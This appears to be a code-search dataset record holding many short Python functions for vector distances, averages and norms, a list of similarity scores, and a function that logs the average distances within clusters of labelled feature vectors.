range(len(vector1))])\n\n num = pSum - (sum1*sum2/len(vector1))\n den = math.sqrt((sum1Sq - pow(sum1,2)/len(vector1)) * (sum2Sq - pow(sum2,2)/len(vector1)))\n\n if den == 0 : return 0.0\n return 1.0 - num/den", "def hellinger_dist(v1, v2):\n if len(v1) != len(v2):\n raise ValueError(\"Vectors should have the same size! 
\")\n return sqrt( sum( map(lambda e: \n (sqrt(e[0])-sqrt(e[1]))**2, zip(v1,v2))))/sqrt(2)", "def avg(vector):\n if len(vector) == 0:\n return 0\n return sum(vector) / len(vector)", "def euclidean_distance(list1, list2):\n # Make sure we're working with lists\n # Sorry, no other iterables are permitted\n assert isinstance(list1, list)\n assert isinstance(list2, list)\n\n dist = 0\n\n # 'zip' is a Python builtin, documented at\n # <http://www.python.org/doc/lib/built-in-funcs.html>\n for item1, item2 in zip(list1, list2):\n dist += (item2 - item1)**2\n return math.sqrt(dist)", "def euclidean_distance(a: Tuple[float, ...], b: Tuple[float, ...]) -> float:\n assert len(a) == len(b)\n return sqrt(sum(pow(x[0] - x[1], 2) for x in zip(a, b)))", "def dist(self, a, b, l):\n # works for non-arrays\n return sum( ((i-j)/k)**2 for i,j,k in zip(a, b, l) )", "def computeMeans(list_of_lists):\n # Find length of longest list\n longest = 0\n for lst in list_of_lists:\n if len(lst) > longest:\n longest = len(lst)\n # Get totals\n tots = [0]*(longest)\n for lst in list_of_lists:\n for i in range(longest):\n if i < len(lst):\n tots[i] += lst[i]\n else:\n tots[i] += lst[-1]\n # Convert tots to an array to make averaging across each index easier\n tots = pylab.array(tots)\n # Compute means\n means = tots/float(len(list_of_lists))\n return means", "def computeMeans(list_of_lists):\n # Find length of longest list\n longest = 0\n for lst in list_of_lists:\n if len(lst) > longest:\n longest = len(lst)\n # Get totals\n tots = [0]*(longest)\n for lst in list_of_lists:\n for i in range(longest):\n if i < len(lst):\n tots[i] += lst[i]\n else:\n tots[i] += lst[-1]\n # Convert tots to an array to make averaging across each index easier\n tots = pylab.array(tots)\n # Compute means\n means = tots/float(len(list_of_lists))\n return means", "def compare_vectors(v1, v2):\n if len(v1) == len(v2):\n distance = 0\n for i in xrange(len(v1)):\n distance += (v1[i] - v2[i]) ** 2\n return distance\n else:\n print \"vector not match in dimensions\"", "def add_vectorlist(vectors):\n x, y, z = zip(*vectors)\n return sum(x), sum(y), sum(z)", "def average_distance(l1, l2, distance_function=None):\n\n if not distance_function:\n distance_function = levenshtein_ratio\n counter = 0.0\n numerator = 0.0\n \n #compute array of values\n# if not l1 or not l2:\n# return 1.0\n #make l1 the shortes\n l1, l2 = len(l1)<len(l2) and (l1, l2) or (l2, l1)\n \n #compute the distrances\n distances = []\n for s1 in l1:\n distances += [(distance_function(s1, s2), s1, s2) for s2 in l2]\n# ls.sort(reverse=True)\n# distances.append((ls, s1))\n distances.sort(reverse=True)\n #compute maxima for each colum and each row\n done = set()\n for d, s1, s2 in distances:\n if s1 not in done and s2 not in done:\n done.add(s1)\n done.add(s2) \n counter += d\n numerator += 1\n #if there is a difference in length, we penalize for each item \n difference = len(l2) - len(l1)\n counter += .8 * difference\n numerator += difference\n if numerator == 0:\n return 1.0\n return counter/numerator", "def vector_sum(vectors):\n results = vectors[0]\n for vector in vectors[1:]:\n results = vector_add(results, vector)\n return results", "def average_distance(self):\r\n total = 0\r\n edges = 0\r\n for code, _list in self.edges.items():\r\n for edge in _list:\r\n total += edge.distance\r\n edges += 1\r\n return total / edges", "def obtain_pairwise_distances(normal, abnormal, num_comparisons):\n avg_dist = np.zeros(len(DIST_METRICS), dtype=float)\n for i, metric in 
enumerate(sorted(DIST_METRICS)):\n\n # Iterate through all combinations of pairs of vectors\n for idx_g1 in range(len(normal)):\n for idx_g2 in range(len(abnormal)):\n t1 = normal[idx_g1]\n t2 = abnormal[idx_g2]\n\n # Determine which metric to compute by indexing dictionary\n dist = DIST_METRICS[metric](t1, t2)\n avg_dist[i] = avg_dist[i] + dist\n\n # Compute the average\n avg_dist = avg_dist / num_comparisons\n\n return avg_dist", "def compute_pairwise_distances(input_vecs: types.Tensor) -> types.Tensor:\n r = tf.reduce_sum(input_vecs * input_vecs, axis=1, keepdims=True)\n pdistance_matrix = (\n r\n - 2 * tf.matmul(input_vecs, input_vecs, transpose_b=True)\n + tf.transpose(r)\n )\n return tf.cast(pdistance_matrix, dtype=tf.float32)", "def vector_weighted_average(vf, weights):\n weights_sum = weights.sum()\n y_average = (vf[:,:,0] * weights).sum() / weights_sum\n x_average = (vf[:,:,1] * weights).sum() / weights_sum\n return np.array([y_average, x_average])", "def euclidean_distance(vector_1, vector_2) -> float:\n\n\n before_square_root = 0\n for i in range(len(vector_1)):\n before_square_root += (vector_1[i] - vector_2[i])**2\n\n d = math.sqrt(before_square_root)\n print(d)\n return(d)", "def distance(p1, p2):\n\n \"\"\"\n (p1[0] - p2[0]) ** 2 + \n (p1[1] - p2[1]) ** 2 + \n \"\"\"\n sum_all = 0\n for i, v in enumerate(p1):\n diff_squared = (v - p2[i]) ** 2\n sum_all += diff_squared\n return(math.sqrt(sum_all))", "def vector_dist(v, w):\n if isinstance(v, list):\n v = np.asarray(v)\n return vector_mag(v - w)", "def average(coords):\n x = 0\n y = 0\n for coord in coords:\n x += coord[0]\n y += coord[1]\n count = len(coords)\n return (x/count, y/count)", "def get_average_of_elements(first_list, second_list):\r\n count = 0\r\n for x in first_list:\r\n if first_list not in second_list:\r\n count += x\r\n return count // len(first_list)", "def deviationAvg(xs):\n\treturn deviation(xs) / sqrt(len(xs))", "def avg(u: np.ndarray, v: np.ndarray) -> np.ndarray:\n \n return (u + v) / 2.0", "def avg(list):\n return sum(list) / len(list)", "def compute_euclidean_dist(vec1, vec2):\r\n assert len(vec1) == len(vec2)\r\n vec1 = np.array(vec1)\r\n vec2 = np.array(vec2)\r\n return np.sqrt(np.sum(np.square(vec2 - vec1)))", "def vector_sum(vectors):\n\tresult = vectors[0]\n\tfor vector in vectors:\n\t\tresult = vector_add(result, vector)\n\treturn result", "def price_average(lst):\n\n return sum(lst) / len(lst)", "def norm_dist(face_vectors, f_vector):\n if len(face_vectors) == 0:\n return np.empty((0))\n return np.linalg.norm(face_vectors - f_vector, axis=1)", "def std(l: List[float]) -> float:\n n = len(l)\n if n == 0:\n return 0\n avg = average(l)\n return sqrt(sum([(avg - i) * (avg - i) for i in l]))", "def EuclideanDistanceSq( self, a, b ):\n if not (type(a) == list or type(a) == Vector):\n a = [a]\n if not (type(b) == list or type(a) == Vector):\n b = [b]\n assert len(a) == len(b)\n sqDist = 0\n for x,y in zip(a,b):\n sqDist += (x-y)**2\n return sqDist", "def get_average_vec(tokens_list, vector, generate_missing=False, k=300):\r\n if len(tokens_list)<1:\r\n return np.zeros(k)\r\n \r\n if generate_missing:\r\n vectorized = [vector[word] if word in vector else np.random.rand(k) for word in tokens_list]\r\n else:\r\n vectorized = [vector[word] if word in vector else np.zeros(k) for word in tokens_list]\r\n \r\n length = len(vectorized)\r\n summed = np.sum(vectorized, axis=0)\r\n averaged = np.divide(summed, length)\r\n return averaged", "def get_euclid_dist(vec_1, vec_2):\n\n\treturn 
np.sqrt(np.sum(np.fabs(vec_1 - vec_2), axis=1)).flatten()", "def average_double_pts(elev_list, dist_list, minimum_point_distance=0.5):\n import numpy as np\n\n dist_array = np.array(dist_list)\n\n diffs = dist_array[1:] - dist_array[:-1]\n bad_pts = diffs < minimum_point_distance\n bad_indices = [i for i in range(len(bad_pts)) if bad_pts[i]]\n\n new_elev_array = np.array(elev_list)\n\n for i in bad_indices:\n mean_elevation = (elev_list[i] + elev_list[i+1])/2\n new_elev_array[i] = mean_elevation\n new_elev_array[i+1] = mean_elevation\n\n new_dist_array = dist_array[0:-1]\n new_dist_array = new_dist_array[np.logical_not(bad_pts)]\n\n new_elev_array = np.array(new_elev_array[0:-1], copy=True)\n new_elev_array = new_elev_array[np.logical_not(bad_pts)]\n\n new_dist_list = list(new_dist_array)\n new_dist_list.append(dist_list[-1])\n new_elev_list = list(new_elev_array)\n new_elev_list.append(elev_list[-1])\n\n return new_elev_list, new_dist_list", "def distance_vectors_pairwise(anchor, positive, negative):\n\n a_sq = torch.sum(anchor * anchor, dim=1)\n p_sq = torch.sum(positive * positive, dim=1)\n n_sq = torch.sum(negative * negative, dim=1)\n\n eps = 1e-8\n d_a_p = torch.sqrt(a_sq + p_sq - 2*torch.sum(anchor * positive, dim = 1) + eps)\n d_a_n = torch.sqrt(a_sq + n_sq - 2*torch.sum(anchor * negative, dim = 1) + eps)\n d_p_n = torch.sqrt(p_sq + n_sq - 2*torch.sum(positive * negative, dim = 1) + eps)\n return d_a_p, d_a_n, d_p_n", "def euclidean_distance(vector_1: Vector, vector_2: Vector) -> VectorOut:\n return np.sqrt(np.sum((np.asarray(vector_1) - np.asarray(vector_2)) ** 2))", "def func(lst):\n tot = 0\n for i in lst:\n tot = tot + i\n avg = tot / len(lst)\n return avg", "def CalculateListAverage(values):\n if not values:\n return 0\n return sum(values) / float(len(values))", "def euclidean_distance(vector_x, vector_y):\n if len(vector_x) != len(vector_y):\n raise Exception('Vectors must be same dimensions')\n return math.sqrt(sum((vector_x[dim] - vector_y[dim]) ** 2 for dim in range(len(vector_x))))", "def get_distance(self, vec):\r\n\r\n sum = 0\r\n if len(self.weights) == len(vec):\r\n for i in range(len(vec)):\r\n sum += (self.weights[i] - vec[i]) * (self.weights[i] - vec[i])\r\n return np.sqrt(sum)\r\n else:\r\n sys.exit(\"Error: dimension of nodes != input data dimension!\")", "def cal_distances(embeddings):\n # calculate\n dist = np.zeros([len(embeddings), len(embeddings)], dtype=float)\n for ii in xrange(len(embeddings)):\n for jj in xrange(ii + 1, len(embeddings)):\n dist[ii, jj] = np.linalg.norm(embeddings[ii] - embeddings[jj])\n dist[jj, ii] = dist[ii, jj] \n \n # return\n return dist", "def genre_average(genre_vectors):\n array = [vector for vector in genre_vectors]\n return np.average(array, axis=0)", "def _avg_sd_from_list(lst):\n arr = flex.double(lst)\n avg = round(flex.mean(arr), 5)\n std = round(arr.standard_deviation_of_the_sample(), 5)\n return avg, std", "def get_distance(list1, list2):\n import math\n distance_result = (list1[0] - list2[0]) ** 2 + (list1[1] - list2[1]) ** 2 + (list1[2] - list2[2]) ** 2\n return math.sqrt(abs(distance_result))", "def _calculate_distance(self, ordered_list):\r\n\r\n total_distance = 0\r\n previous_point = None\r\n for point in ordered_list:\r\n if previous_point is not None:\r\n angle, distance = previous_point.angleAndDistanceTo(point) # geodesic distance in meters\r\n total_distance += distance\r\n previous_point = point\r\n\r\n return total_distance", "def DifferenceVectors(alist,blist):\n #alist a molecule\n #blist b molecule\n #d 
difference of two sparce vectors in power of 2\n A=set(alist)\n B=set(blist)\n D=int(len(A.difference(B))+len(B.difference(A)))\n return D", "def stat(lst):\n n = float(len(lst))\n mean = sum(lst) / n\n stdev = sqrt((sum(x * x for x in lst) / n) - (mean * mean))\n return mean, stdev", "def distance(self, vector1, vector2):\n\t\tsum_sq = 0\n\t\tfor i in range(28):\n\t\t\tfor j in range(28):\n\t\t\t\tsum_sq += (vector1[i][j] - vector2[i][j])**2\n\t\treturn math.sqrt(sum_sq)", "def compute_distance (uVector, uOther):\n ## since each element can be either 0 or 1,\n ## no need for square roots and pow\n d = 0\n for i in range (len(uVector)):\n d = d + math.pow((int(uVector [i]) - int(uOther [i])), 2)\n\n return d", "def distance(v: Vector, w: Vector) -> float:\n return magnitude(subtract(v, w))", "def euclidean_distance_no_np(vector_1: Vector, vector_2: Vector) -> VectorOut:\n return sum((v1 - v2) ** 2 for v1, v2 in zip(vector_1, vector_2)) ** (1 / 2)", "def inter_distance(point,*args):\n\tdists = []\n\tfor clust in args:\n\t\tdistance = 0\n\t\tfor val in clust:\n\t\t\tdistance += L2(point,val)\n\n\t\tif len(clust) == 1:\n\t\t\tdists.append(distance)\n\t\telse:\n\t\t\tdists.append(distance/len(clust))\n\n\t\t\n\treturn min(dists)", "def euclidean_distance(vec1, vec2):\n return numpy.linalg.norm(vec1 - vec2)", "def get_distance_metrics(source_embeddings, target_embeddings):\n cosine_avg, euclidean_avg = 0.0, 0.0\n for i in range(len(source_embeddings)):\n cosine_avg += cosine(source_embeddings[i], target_embeddings[i])\n euclidean_avg += euclidean(source_embeddings[i], target_embeddings[i])\n return (cosine_avg / len(source_embeddings)), (euclidean_avg / len(source_embeddings))", "def average(l):\n return float(sum(l)/len(l))", "def average(lst):\n return sum(lst)/len(lst)", "def normalize(vectors):\n\n vectors = list(vectors)\n mins = [min(x) for x in zip(*vectors)]\n maxs = [max(x) for x in zip(*vectors)]\n for vector in vectors:\n yield [(number - min_) / (max_ - min_)\n for min_, max_, number in zip(mins, maxs, vector)]", "def deviation(xs):\n\ta = avg(xs)\n\treturn sqrt(sum([(x - a) ** 2 for x in xs]) / (len(xs) - 1))", "def vector_sum(vectors: List[Vector]) -> Vector:\n assert vectors, 'no vectors provided'\n\n num_elements = len(vectors[0])\n assert all(\n len(v) == num_elements for v in vectors), 'vectors must be the same length'\n\n return [sum(vec[i] for vec in vectors) for i in range(num_elements)]", "def vector_sum(vectors: List[Vector]) -> Vector:\n # Check that vectors is not empty\n assert vectors, \"no vectors provided!\"\n\n # Check the vectors are all the same size\n num_elements = len(vectors[0])\n assert all(len(v) == num_elements for v in vectors), \"different sizes!\"\n\n # the i-th element of the result is the sum of every vector[i]\n return [sum(vector[i] for vector in vectors)\n for i in range(num_elements)]", "def avg_dists(self):\n \n d = self.descriptors\n # make an empty array to fill b/c it is a touch faster\n averages = np.empty([1, self.d_length])\n for i, u in enumerate(d):\n s = 0\n for j, v in enumerate(d):\n if i != j:\n s += self.jaccard(u, v)\n averages[0, i] = (s / (self.d_length-1))\n return averages[0]", "def sum_of_squares(v: Vector) -> float:\n return dot(v,v)", "def euclidean_distance(s1,s2): \n tmpsum = 0\n \n for index,value in enumerate(s1):\n tmpsum += (s1[index]-s2[index])**2\n \n return math.sqrt(tmpsum)", "def vector_sum(vectors: List[Vector]) -> Vector:\n # Check that vectors is not empty\n assert vectors, \"no vectors provided!\"\n\n # Check 
the vectors are all the same size\n num_elements = len(vectors[0])\n assert all(len(v) == num_elements for v in vectors), \"different sizes!\"\n\n return [sum(vector[i] for vector in vectors)\n for i in range(num_elements)]", "def calcEuclideanDistance(d1, d2):\n #initiate empty list\n result = []\n #for each index in the list, each position in both list minus each other\n #and to the power of two. Add this in the result list\n for idx in range(len(d1)):\n result.append((d1[idx]-d2[idx])**2)\n\n #Return the square of the sum of all values in the result list\n return math.sqrt(sum(result))", "def get_distance(descriptive_vector1, descriptive_vector2 ):\n return np.linalg.norm(descriptive_vector1 - descriptive_vector2)", "def norm(vector):\r\n result = 0\r\n # initial value for the result of this function\r\n for z in range(len(vector)):\r\n # this loop will continue as long as there are more values in the list \r\n result += vector[z]**2\r\n result = result**.5\r\n # The two equations above find the sum of the squares and then the square root of the squares\r\n return result", "def norm(vec):\n return sqrt(sum([i**2 for i in vec]))", "def average(ls):\n\n if len(ls) == 0:\n return 0.0\n\n sm = sum(ls)\n return sm / len(ls)", "def dist_squared (a, b):\n return sum(map(lambda (x,y): (x-y)**2, zip(a, b)))", "def avg(l):\n return (sum(l)/float(len(l)))", "def calculateEuclideanDistance(vector):\r\n global euclideanDistance\r\n # create linkage matrix with the distance metric as euclidean distance\r\n # calculate the distances of the clusters by starting as singletons\r\n # and in each iteration will merge the two clusters which have the smallest distance\r\n # returns array of length n - 1\r\n # Z[i] will tell us which clusters were merged in the i-th iteration\r\n # each row has format [cluster1, cluster1, dist, sample_count].\r\n euclideanDistance = linkage(vector, metric='euclidean')", "def weighted_average(listofvalues):\n total = 0\n weights = 0\n for [w, v] in listofvalues:\n total += w*v\n weights += w\n return total/weights", "def distance_sq(self, other_vector):\n return sum((x - y) ** 2 for x, y in zip(self.vector, other_vector))", "def get_aggregate_vector(vectors):\n\n aggregate_vector = np.zeros((300, 1))\n for vec in vectors:\n vec = np.array(vec).reshape(300, 1)\n aggregate_vector += vec\n\n aggregate_vector = aggregate_vector / len(vectors)\n return aggregate_vector", "def compute_object_average_surface_distances(labelled_surface_distances_1, labelled_surface_distances_2):\n asd_label_1 = []\n for surface_distance in labelled_surface_distances_1:\n asd_label_1.append(np.mean(surface_distance))\n\n asd_label_2 = []\n for surface_distance in labelled_surface_distances_2:\n asd_label_2.append(np.mean(surface_distance))\n\n return (\n np.array(asd_label_1),\n np.array(asd_label_2),\n )", "def _weightedAverage(list_):\n\n\t\taccum = [0, 0]\n\n\t\tfor point, weight in list_:\n\n\t\t\taccum[0] += point[0] * weight\n\t\t\taccum[1] += point[1] * weight\n\n\t\ttotalWeight = sum([weight for point, weight in list_])\n\n\n\t\tif totalWeight == 0:\n\t\t\t\n\t\t\treturn (0, 0)\n\n\n\t\taccum[0] /= float(totalWeight)\n\t\taccum[1] /= float(totalWeight)\n\n\t\treturn (accum[0], accum[1])", "def avg(lst: list):\n return sum(lst) / len(lst)", "def __calculate_average_distance(self):\n game = self.__game # type: Game\n all_icebergs = game.get_all_icebergs()\n all_icebergs_length = len(all_icebergs)\n sum_distances = 0\n for i in range(all_icebergs_length):\n for j in range(i + 1, 
all_icebergs_length):\n iceberg1 = all_icebergs[i]\n iceberg2 = all_icebergs[j]\n sum_distances += iceberg1.get_turns_till_arrival(iceberg2)\n\n return sum_distances / (all_icebergs_length * (all_icebergs_length - 1) / 2)", "def sum_of_squares(v: Vector) -> float:\n return dot(v, v)", "def sum_of_squares(v: Vector) -> float:\n return dot(v, v)", "def sum_of_squares(v: Vector) -> float:\n return dot(v, v)", "def test_vector_dist(self):\r\n v1 = [1, 4, 2]\r\n v2 = [-1, 12, 4]\r\n\r\n exp = 8.48528137424\r\n obs = self.best._vector_dist(v1, v2)\r\n assert_almost_equal(exp, obs)\r\n\r\n v1 = [1, 2, 100, 4, 2]\r\n v2 = [-1, 12, 4, 12, 99]\r\n\r\n exp = 137.087563258\r\n obs = self.best._vector_dist(v1, v2)\r\n assert_almost_equal(exp, obs)" ]
[ "0.7456902", "0.7266837", "0.7161427", "0.66369", "0.66369", "0.6613315", "0.6526983", "0.6526983", "0.652161", "0.652161", "0.652161", "0.6493121", "0.6426592", "0.641932", "0.61453825", "0.6135802", "0.6098236", "0.60969055", "0.60628074", "0.6040219", "0.6035585", "0.6013587", "0.5990824", "0.5973708", "0.5933027", "0.5933027", "0.58944213", "0.5887823", "0.58707106", "0.58558226", "0.58500975", "0.58468646", "0.5821706", "0.5813525", "0.5793884", "0.57928586", "0.5791478", "0.5783578", "0.5774629", "0.5741828", "0.57401866", "0.57379985", "0.57379174", "0.57365155", "0.57356507", "0.5721594", "0.5711495", "0.57106465", "0.5709194", "0.570738", "0.56993973", "0.5690193", "0.56852686", "0.5685154", "0.5680904", "0.5664199", "0.56614834", "0.5657509", "0.5656348", "0.5654142", "0.56380755", "0.5636283", "0.56110585", "0.56103873", "0.5608834", "0.5607497", "0.560002", "0.5597526", "0.5585994", "0.5582634", "0.55804646", "0.55768186", "0.5575889", "0.5571256", "0.5563191", "0.5562181", "0.55573595", "0.5556962", "0.55557835", "0.55549186", "0.5554202", "0.55511165", "0.5551053", "0.55510396", "0.5544279", "0.55419123", "0.55412364", "0.55406207", "0.5539833", "0.5537789", "0.553624", "0.55332893", "0.55329734", "0.55296797", "0.55225855", "0.5521511", "0.55192345", "0.55192345", "0.55192345", "0.5512115" ]
0.8062336
0
Reads feature vectors and labels from a file and prints information about their clustering properties. Here, we think of the space of feature vectors, and consider a vector v_i to be in cluster j if j is one of the labels for example i.
def analyze_feature_vector_clusters(features_file_path, distance=utils.L2_distance):
    feature_vectors, label_vectors = utils.read_feature_and_label_vectors(features_file_path)
    logging.info('Building clusters...')
    # Map from (integer j) --> (list of indices i such that feature_vectors[i] is in cluster j)
    # Cluster 0 indicates no disease
    indices_for_label = map_labels_to_example_indices(label_vectors)
    logging.info('...done.')
    logging.info('Computing global and within-cluster average distances')
    # Compute average distance between vectors overall
    global_average_distance = average_distance_between_vectors(feature_vectors, distance)
    logging.info('Global average ' + distance.__name__ + ' between vectors: ' + str(global_average_distance))
    # Compute average distance within each cluster
    for j, vector_indices in indices_for_label.items():
        vectors_in_cluster = [feature_vectors[index] for index in vector_indices]
        average_cluster_distance = average_distance_between_vectors(vectors_in_cluster, distance)
        logging.info('Average ' + distance.__name__ + ' between vectors in cluster ' + str(j) + ': ' + str(average_cluster_distance))
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def load_vectors (file_extension = None):\n \n feat_file_name = 'output/' + file_extension + '.feature'\n label_file_name = 'output/' + file_extension + '.label'\n \n prettyPrint( \"Loading feature vectors and labels from disk ... \", color.CYAN)\n if not os.path.isfile(feat_file_name) or not os.path.isfile(label_file_name):\n prettyPrint(\"Feature vector files {0} could not be found. Generating from scratch instead ...\".format(feat_file_name), color.CYAN)\n return None, None\n with open(feat_file_name, 'r') as f:\n feat_vec = pickle.load(f)\n with open(label_file_name, 'r') as f:\n labels = pickle.load(f)\n\n prettyPrint (\"Done loading feature vectors.\", color.CYAN)\n return feat_vec, labels", "def sent_or_doc_cluster(file_in, file_out, feature, method, n_cluster, show_or_write):\n\n original_file = file_in[0]\n original_words_file = file_in[1]\n file_vec = file_in[2]\n\n if feature.lower() == 'onehot':\n with open(file_vec, 'rb') as f_in:\n content_id = pickle.load(f_in)\n id_vec = pickle.load(f_in)\n id_onehot = pickle.load(f_in)\n x = []\n for i, onehot in id_onehot.items():\n x.append(onehot.tolist())\n\n X = np.array(x)\n\n if method.lower() == 'ap':\n instance = AffinityPropagation(affinity='cosine').fit(X)\n elif method.lower() == 'kmeans':\n instance = KMeans(n_cluster=n_cluster).fit(X)\n\n labels = instance.labels_.tolist()\n id_cluster = {}\n cluster_ids = {}\n for i in range(len(labels)):\n id_cluster[i] = labels[i]\n\n for i, cluster in id_cluster.items():\n if cluster not in cluster_ids:\n cluster_ids[cluster] = []\n cluster_ids[cluster].append(i)\n else:\n cluster_ids[cluster].append(i)\n pass\n if show_or_write == 'show':\n show(original_file, cluster_ids)\n else:\n keycontent_cluster_write_to_file(\n file_in=[original_file, original_words_file],\n file_out=file_out[0],\n id_cluster\n )\n keycontent_cluster_digest(\n file_in=[original_file, original_words_file],\n file_out=file_out[1],\n cluster_ids=cluster_ids\n )\n pass\n\n elif feature.lower() == 'vec':\n with open(file_vec, 'rb') as f_in:\n content_id = pickle.load(f_in)\n id_vec = pickle.load(f_in)\n id_onehot = pickle.load(f_in)\n x = []\n for i, vec in id_vec.items():\n x.append(vec.tolist()) # int object jas nor attribute 'tolist'\n\n X = np.array(x)\n\n if method.lower() == 'ap':\n instance = AffinityPropagation(affinity='cosine').fit(X)\n elif method.lower() == 'kmeans':\n instance = KMeans(n_clusters=n_cluster).fit(X)\n else:\n raise ValueError(\"Method must be 'ap' or \"\n \"'kmeans'. Got %s instead\"\n % method)\n\n labels = instance.labels_.tolist()\n id_cluster = {}\n cluster_ids = {}\n for i in range(len(labels)):\n id_cluster[i] = labels[i]\n\n for i, cluster in id_cluster.items():\n if cluster not in cluster_ids:\n cluster_ids[cluster] = []\n cluster_ids[cluster].append(i)\n else:\n cluster_ids[cluster].append(i)\n if show_or_write == 'show':\n show(original_file, cluster_ids)\n else:\n keycontent_cluster_write_to_file(\n file_in=[original_file, original_words_file],\n file_out=file_out[0],\n id_cluster\n )\n keycontent_cluster_digest(\n file_in=[original_file, original_words_file],\n file_out=file_out[1],\n cluster_ids=cluster_ids\n )\n pass\n elif feature.lower() == 'doc2vec':\n # word2vec.doc2vec\n pass\n else:\n raise ValueError(\n \"Feature must be 'onehot' or 'vec' or 'doc2vec'. 
Got %s instead\" % feature)\n pass\n\n pass", "def print_clusters(vectors, labels, nclusters, show=False):\n plt.figure(1)\n plt.clf()\n\n vecs2D = TSNE(n_components=2).fit_transform(vectors)\n\n colors = cycle('bgrcmykbgrcmykbgrcmykbgrcmyk')\n for k, col in zip(range(nclusters), colors):\n my_members = labels == k\n\n cluster_vecs2D = vecs2D[my_members, :]\n\n print(cluster_vecs2D)\n print(cluster_vecs2D[:,0])\n print(cluster_vecs2D[:,1])\n\n plt.scatter(cluster_vecs2D[:,0], \n cluster_vecs2D[:,1], \n c=col, \n label='cluster {}'.format(k))\n\n plt.title('Estimated clusters')\n plt.legend()\n\n if show:\n plt.show()\n\n cwd = os.getcwd()\n if not os.path.exists(cwd+\"/plots\"):\n os.makedirs(cwd+\"/plots\")\n plt.savefig(cwd+'/plots/clusters.png')", "def read_data(feature_file, label_file):", "def load_libsvm_file(file, labels_format=\"list\", sort_indices=False):\n if labels_format == 'list':\n labels, features = _load_libsvm_file_labels_list(file, sort_indices)\n return csr_matrix(features), labels\n elif labels_format == 'csr_matrix':\n labels, features = _load_libsvm_file_labels_csr_matrix(file, sort_indices)\n return csr_matrix(features), csr_matrix(labels)\n else:\n raise ValueError(\"Label format {} is not valid format\".format(labels_format))", "def creating_feature_vector():\r\n\twordlist = []\r\n\tlabel = \"\"\r\n\tfw = open(\"feature_vector.txt\", \"w+\", encoding = \"utf-8\")\r\n\twith open(\"D:\\\\Python_Prac\\\\wordstag\\\\modules\\\\HI_EN_TRAIN.txt\", \"r\", encoding = \"utf-8\") as f:\r\n\t\tfor line in f:\r\n\t\t\twordlist.append(line)\r\n\t\tfor index, line in enumerate(wordlist):\r\n\t\t\tif line == \"\\n\":\r\n\t\t\t\tcontinue\r\n\t\t\tcontext = line.split(\"\\t\")\r\n\t\t\tlabel = context[1]\r\n\t\t\tfeature_vector = label+\" \"\r\n\t\t\tngram_vector = ngram_frequency(str(context[0]))\r\n\t\t\tfor vector in ngram_vector:\r\n\t\t\t\tfeature_vector += str(vector)+\" \"\r\n\t\t\tfeature_vector += str(is_english(context[0]))+\" \"\r\n\t\t\tfeature_vector += str(is_hindi(context[0]))+\" \"\r\n\t\t\tfeature_vector += str(is_abbr(context[0]))+\" \"\r\n\t\t\tfeature_vector += str(med_in_english(context[0]))+\" \"\r\n\t\t\tfeature_vector += str(med_in_hindi(context[0]))+\" \"\r\n\t\t\tbefore = [0,0,0]\r\n\t\t\tafter = [0,0,0]\r\n\t\t\tfor i in range(3):\r\n\t\t\t\tif (index-i) < 0 or (index-i+1) > len(wordlist)-1:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tbefore[2-i] = get_word_context(wordlist[index-i+1].split(\"\\t\")[0])\r\n\t\t\tfor i in range(3):\r\n\t\t\t\tif (index+i+1) > len(wordlist)-1:\r\n\t\t\t\t\tcontinue\r\n\t\t\t\tafter[2-i] = get_word_context(wordlist[index+i+1].split(\"\\t\")[0])\r\n\t\t\tfor i in before:\r\n\t\t\t\tfeature_vector += str(i)+\" \"\r\n\t\t\tfor i in after:\r\n\t\t\t\tfeature_vector += str(i)+\" \"\r\n\t\t\tfeature_vector += \"\\n\"\r\n\t\t\tfw.write(feature_vector)\r\n\t\t\tprint(\"Proceeding...\"+str(index+1)+\" of 16683\")\r\n\r\n\tfw.close()", "def load_glove_vec(fname):\n word_vecs = {}\n length = 0\n with open(fname, \"rb\") as f:\n for i, line in enumerate(f):\n L = line.split()\n word = L[0].lower()\n word_vecs[word] = np.array(L[1:], dtype='float32')\n if length == 0:\n length = len(word_vecs[word])\n return word_vecs, length", "def get_features_from_file(self):\n f_list = []\n f = open(\"verifiability_features.txt\", \"r\")\n for line in f:\n f_list.append(line)\n self.features = f_list", "def get_features_from_file(self):\n f_list = []\n f = open(\"verifiability_features.txt\", \"r\")\n for line in f:\n f_list.append(line)\n self.features = 
f_list", "def load_glove_vectors(filename, vocab):\n dct = {}\n vectors = array.array('d')\n current_idx = 0\n with open(filename, \"r\", encoding=\"utf-8\") as f:\n for _, line in enumerate(f):\n tokens = line.split(\" \")\n word = tokens[0]\n entries = tokens[1:]\n if not vocab or word in vocab:\n dct[word] = current_idx\n vectors.extend(float(x) for x in entries)\n current_idx += 1\n word_dim = len(entries)\n num_vectors = len(dct)\n return [np.array(vectors).reshape(num_vectors, word_dim), dct]", "def main():\n\n# The following codes loads the data set into a 2D np array called data\n\twith open('complete_data.csv') as features_file:\n\t\tcsv_reader = csv.DictReader(features_file, delimiter = ',')\n\t\tdata = []\n\t\tcounter = 0\n\t\tfor row in csv_reader:\n\t\t\tprint(\"csv_reader row:\", row)\n\t\t\t# if(counter == 20):\n\t\t\t# \tbreak\n\t\t\tcounter+=1\n\t\t\tcleaned_row = []\n\t\t\tcleaned_row.append(row['track'])\n\t\t\tcleaned_row.append(row['loudness'])\n\t\t\tcleaned_row.append(row['score'])\n\t\t\tdata.append(np.array(cleaned_row))\n\t\tdata = random.sample(list(data), 30)\n\t\tdata = np.array(data)\n\n\n\tX = []\n\tY = []\n\tcounter = 0\n\tfor row in data:\n\t\t# if(counter == 10):\n\t\t# \tbreak\n\t\t# counter+=1\n\t\tY.append(row[0])\n\t\tl = [float(i) for i in row[1:]]\n\t\tX.append(l)\n\tX = np.array(X)\n\tY = np.array(Y)\n\n\tcentroid_indices2,centroids2 = sk_learn_cluster(X,Y,3)\n\n\tplot_word_clusters(data, centroids2, centroid_indices2 )", "def _extractGloveVects():\n \n embeddings_index = {}\n\n with open(GLOVE_CORPUS_FILE) as f:\n for line in f:\n values = line.split()\n word = values[0].lower()\n if word not in _cachedStopWords:\n coefs = np.asarray(values[1:], dtype='float32')\n embeddings_index[word] = coefs\n\n return embeddings_index", "def cluster_shrinkage_clustering(from_file):\n points = read_points(from_file)\n shuffle(points)\n S = similarity_matrix(points, similarity_measure=euclidean_distance)\n A = cluster(S, k=10, max_iter=1000)\n labels = [np.argmax(p) for p in A]\n xs, ys = zip(*points)\n \n return xs, ys, labels", "def train_routine(training_file, output_folder):\n if output_folder[-1] != 